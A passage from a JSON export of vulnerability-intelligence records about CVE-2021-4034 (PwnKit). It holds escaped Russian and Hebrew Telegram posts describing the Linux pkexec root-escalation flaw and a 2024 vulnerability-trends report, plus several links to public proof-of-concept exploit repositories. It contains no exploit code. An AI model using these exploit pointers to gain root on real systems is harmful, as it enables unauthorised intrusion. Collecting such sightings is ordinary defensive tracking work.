\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0437\u0430 \u0432\u0442\u043e\u0440\u043e\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b 2024 \u0433\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043d\u0430\u0441\u044b\u0449\u0435\u043d\u043d\u044b\u043c \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a \u0438 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\u0412 \u043d\u043e\u0432\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0439 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u0440\u0435\u0437\u044b \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c.\n\n\u041e\u0431\u0449\u0435\u0435 \u0447\u0438\u0441\u043b\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u0440\u0435\u0432\u044b\u0441\u0438\u043b\u043e \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0437\u0430 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0439 \u043f\u0435\u0440\u0438\u043e\u0434 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u0433\u043e\u0434\u0430, \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044f \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430.\n\n\u0414\u043e\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441 PoC \u0438 \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0438\u0445\u0441\u044f \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043d\u0435\u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043d\u0438\u0437\u0438\u043b\u0430\u0441\u044c \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e 2023 \u0433\u043e\u0434\u0430. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u043e \u0442\u0438\u043f\u0443 \u043f\u043e\u0434\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043e\u0442\u0441\u0442\u043e\u044f\u0442\u0441\u044f \u043a \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c.\n\n\u0422\u0430\u043a\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438, \u0442\u0430\u043a \u043a\u0430\u043a \u043a \u0447\u0438\u0441\u043b\u0443 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u041f\u041e \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c: \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043e\u0431\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u0447\u0435\u0440\u0435\u0437 VPN, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u043c\u0438 \u0438 IoT-\u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u0445 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u041b\u041a, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0434\u043b\u044f Windows \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0440\u0430\u0441\u0442\u0438 \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430 \u0441\u0447\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0440\u0430\u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043f\u0443\u0442\u0435\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\u041a \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f \u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Microsoft Office (CVE-2018-0802, CVE-2017-11882\u00a0, CVE-2017-0199\u00a0 \u0438 CVE-2021-40444\u00a0).\n\n\u041d\u0430\u0431\u0438\u0440\u0430\u044e\u0449\u0430\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u043c \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0435 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 Linux \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0440\u043e\u0441\u0442, \u043e\u0434\u043d\u0430\u043a\u043e \u0432 \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0432\u0435\u0441 Windows \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u044f\u0434\u0440\u043e (CVE-2022-0847, CVE-2023-2640 \u0438 CVE-2021-4034), \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f EoP.\n\n\u0422\u043e\u043f-10 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0432 APT-\u0430\u0442\u0430\u043a\u0430\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u00a0\u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430, \u043d\u043e \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0432\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0435 \u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e-\u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u044b\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0442\u0435\u0445 \u0436\u0435 \u0442\u0438\u043f\u043e\u0432: \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0440\u0430\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043e\u0444\u0438\u0441\u043d\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f.\n\n\u0411\u043e\u043b\u044c\u0448\u043e\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Bring You Own Vulnerable Driver (BYOVD). \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043e\u043b\u0436\u043d\u0430 \u0431\u044b\u0442\u044c \u0441\u0432\u0435\u0436\u0435\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u0430\u043c\u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0435 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443.\n\n2023 \u0433\u043e\u0434 \u0441\u0442\u0430\u043b \u0441\u0430\u043c\u044b\u043c \u0431\u043e\u0433\u0430\u0442\u044b\u043c \u043d\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c BYOVD. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0437\u0430 \u043f\u0435\u0440\u0432\u0443\u044e \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0443 2024-\u0433\u043e \u0438\u0445 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0431\u043e\u043b\u044c\u0448\u0435, \u0447\u0435\u043c \u0437\u0430 2021 \u0438 2022 \u0433\u043e\u0434\u044b, \u0432\u043c\u0435\u0441\u0442\u0435 \u0432\u0437\u044f\u0442\u044b\u0435. \u0412\u0442\u043e\u0440\u043e\u0439 \u043a\u0432\u0430\u0440\u0442\u0430\u043b \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0441\u044f \u0440\u043e\u0441\u0442\u043e\u043c \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f.\n\n\u041d\u0430\u0433\u043b\u044f\u0434\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0433\u0440\u0430\u0444\u0438\u043a\u0430 \u0438 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2024 \u0433\u043e\u0434\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2024-08-22T19:40:05.000000Z"}, {"uuid": "0183671a-f843-4ae7-991d-302e5bd55082", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityIL/9552", "content": "\u05d7\u05d1\u05e8\u05ea Qualys \u05de\u05d3\u05d5\u05d5\u05d7\u05ea \u05e2\u05dc \u05d7\u05d5\u05dc\u05e9\u05ea \u05d0\u05d1\u05d8\u05d7\u05ea \u05de\u05d9\u05d3\u05e2 \u05d1\u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05dc\u05d9\u05e0\u05d5\u05e7\u05e1 \u05d4\u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05db\u05dc \u05de\u05e9\u05ea\u05de\u05e9 \u05dc\u05e7\u05d1\u05dc \u05d4\u05e8\u05e9\u05d0\u05d5\u05ea Root. \n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4, \u05e9\u05e7\u05d9\u05d1\u05dc\u05d4 \u05d0\u05ea \u05d4\u05e9\u05dd PwnKit (CVE-2021-4034) , \u05de\u05e0\u05e6\u05dc\u05ea \u05d7\u05d5\u05dc\u05e9\u05d4 \u05d1\u05e8\u05db\u05d9\u05d1 \u05d4\u05e7\u05d9\u05d9\u05dd \u05d1\u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05dc\u05d9\u05e0\u05d5\u05e7\u05e1 \u05d1\u05e9\u05dd pkexec, \u05d4\u05d0\u05d7\u05e8\u05d0\u05d9 \u05e2\u05dc \u05ea\u05e7\u05e9\u05d5\u05e8\u05ea \u05d1\u05d9\u05df \u05e9\u05d9\u05e8\u05d5\u05ea\u05d9\u05dd \u05d1\u05e2\u05dc\u05d9 \u05d4\u05e8\u05e9\u05d0\u05d5\u05ea \u05e9\u05d5\u05e0\u05d5\u05ea, \u05d5\u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05db\u05dc \u05de\u05e9\u05ea\u05de\u05e9 \u05e8\u05d2\u05d9\u05dc \u05dc\u05e7\u05d1\u05dc \u05d4\u05e8\u05e9\u05d0\u05d5\u05ea \u05e0\u05d9\u05d4\u05d5\u05dc.\n\n\u05dc\u05d8\u05e2\u05e0\u05ea Qualys \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05e7\u05d9\u05d9\u05de\u05ea \u05e2\u05d5\u05d3 \u05de-2009 \u05d5\u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05dc\u05d9\u05e0\u05d5\u05e7\u05e1 \u05e9\u05d5\u05e0\u05d5\u05ea \u05d7\u05e9\u05d5\u05e4\u05d5\u05ea \u05dc\u05d7\u05d5\u05dc\u05e9\u05d4 (Ubuntu, Debian, Fedora, CentOS \u05d5\u05e2\u05d5\u05d3).\n\n\u05d1\u05e9\u05dc\u05d1 \u05d6\u05d4 \u05d4\u05d7\u05d1\u05e8\u05d4 \u05dc\u05d0 \u05e4\u05d9\u05e8\u05e1\u05de\u05d4 \u05d0\u05ea \u05d4\u05d3\u05e8\u05da \u05d4\u05de\u05dc\u05d0\u05d4 \u05dc\u05e0\u05d9\u05e6\u05d5\u05dc \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05d0\u05da \u05d4\u05d9\u05d0 \u05de\u05e4\u05e8\u05e1\u05de\u05ea \u05e4\u05e8\u05d8\u05d9\u05dd \u05d8\u05db\u05e0\u05d9\u05d9\u05dd \u05d5\u05db\u05df \u05de\u05e2\u05e7\u05e3 \u05d6\u05de\u05e0\u05d9 \u05e2\u05d3 \u05dc\u05ea\u05d9\u05e7\u05d5\u05df. \n\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1, \u05dc\u05de\u05e8\u05d5\u05ea \u05e9\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05e7\u05dc\u05d4 \u05dc\u05e0\u05d9\u05e6\u05d5\u05dc \u05d4\u05d9\u05d0 \u05de\u05ea\u05d0\u05e4\u05e9\u05e8\u05ea \u05e8\u05e7 \u05dc\u05d0\u05d7\u05e8 \u05e9\u05d9\u05e9 \u05dc\u05de\u05e9\u05ea\u05de\u05e9 \u05d2\u05d9\u05e9\u05d4 \u05de\u05e7\u05d5\u05de\u05d9\u05ea \u05dc\u05de\u05e2\u05e8\u05db\u05ea \u05d4\u05d4\u05e4\u05e2\u05dc\u05d4 (Local).\n\n#\u05d7\u05d5\u05dc\u05e9\u05d4\n\nhttps://t.me/CyberSecurityIL/1629\n\nhttps://www.bleepingcomputer.com/news/security/linux-system-service-bug-gives-root-on-all-major-distros-exploit-released/", "creation_timestamp": "2022-01-26T07:54:32.000000Z"}, {"uuid": "857df057-d8a9-4f3f-9e57-7fa7a74a8c5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/intelexch/7692", "content": "https://github.com/rayheffer/CVE-2021-4034", "creation_timestamp": "2022-03-23T07:47:08.000000Z"}, {"uuid": "97176514-ca76-4bd0-af61-1cc752f942f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/intelexch/7679", "content": "https://github.com/berdav/CVE-2021-4034", "creation_timestamp": "2022-01-27T12:38:34.000000Z"}, {"uuid": "978e92cb-5a97-4cdb-8ef3-6addbb89db8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/1245", "content": "CVE-2021-4034 Local privilege escalation\n\n#CVE-2021-4034 #Vulnerability #PrivilegeEscalation\n#Exploit #Malware #Hacking #RootExploit #BugBounty\n\nhttps://reconshell.com/cve-2021-4034-local-privilege-escalation/", "creation_timestamp": "2022-04-12T20:48:01.000000Z"}, {"uuid": "99c01139-5f83-4508-bd83-afef8b367ed5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/1216", "content": "Automatic Linux privesc exploitation\n\n#CVE-2021-3560 #CVE-2021-4034 #CVE-2022-0847\n#Linux #privesc #exploitation #PrivilegeEscalation\n#vulnerabilities #root #shell #Exploit #Hacking\n\nhttps://reconshell.com/automatic-linux-privesc-exploitation/", "creation_timestamp": "2022-03-12T19:48:01.000000Z"}, {"uuid": "74cb48f5-b4d7-4e77-8625-e770fa7a29b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/intelexch/7747", "content": "https://github.com/Joffr3y/Polkit-CVE-2021-4034-HLP", "creation_timestamp": "2022-02-07T14:59:57.000000Z"}, {"uuid": "4b5d0a22-2f63-4744-ada2-d8380f9a02ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/2558", "content": "\u0418 \u043e\u043f\u044f\u0442\u044c Linux \u0432 \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0435.\n\nQualys \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 pkexec polkit, \u043a\u043e\u0440\u043d\u0435\u0432\u043e\u0439 SUID-\u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435, \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0439 \u0432\u043e \u0432\u0441\u0435\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b CentOS, Debian, Fedora \u0438 Ubuntu \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u044b.\n\nPolicyKit \u0438\u043b\u0438 Polkit - \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442 Unix-\u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0431\u0449\u0435\u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u043c \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438.\u00a0Polkit pkexec \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-4034, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435\u00a0PwnKit, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0443\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 12 \u043b\u0435\u0442 \u0438 \u0431\u044b\u043b\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 pkexec \u0432 \u043c\u0430\u0435 2009 \u0433\u043e\u0434\u0430.\n\n\u041a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 Qualys, \u0443\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u043c\u0443 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 root \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c \u0445\u043e\u0441\u0442\u0435, \u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443.\n\n\u0412\u0441\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0433\u0440\u0430\u043d\u0438\u0446, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f, \u043a\u043e\u0433\u0434\u0430 \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f pkexec \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u044b \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 \u0438 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u043d\u0430\u0439\u0442\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f. \u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0437\u0430\u043f\u0438\u0441\u0438 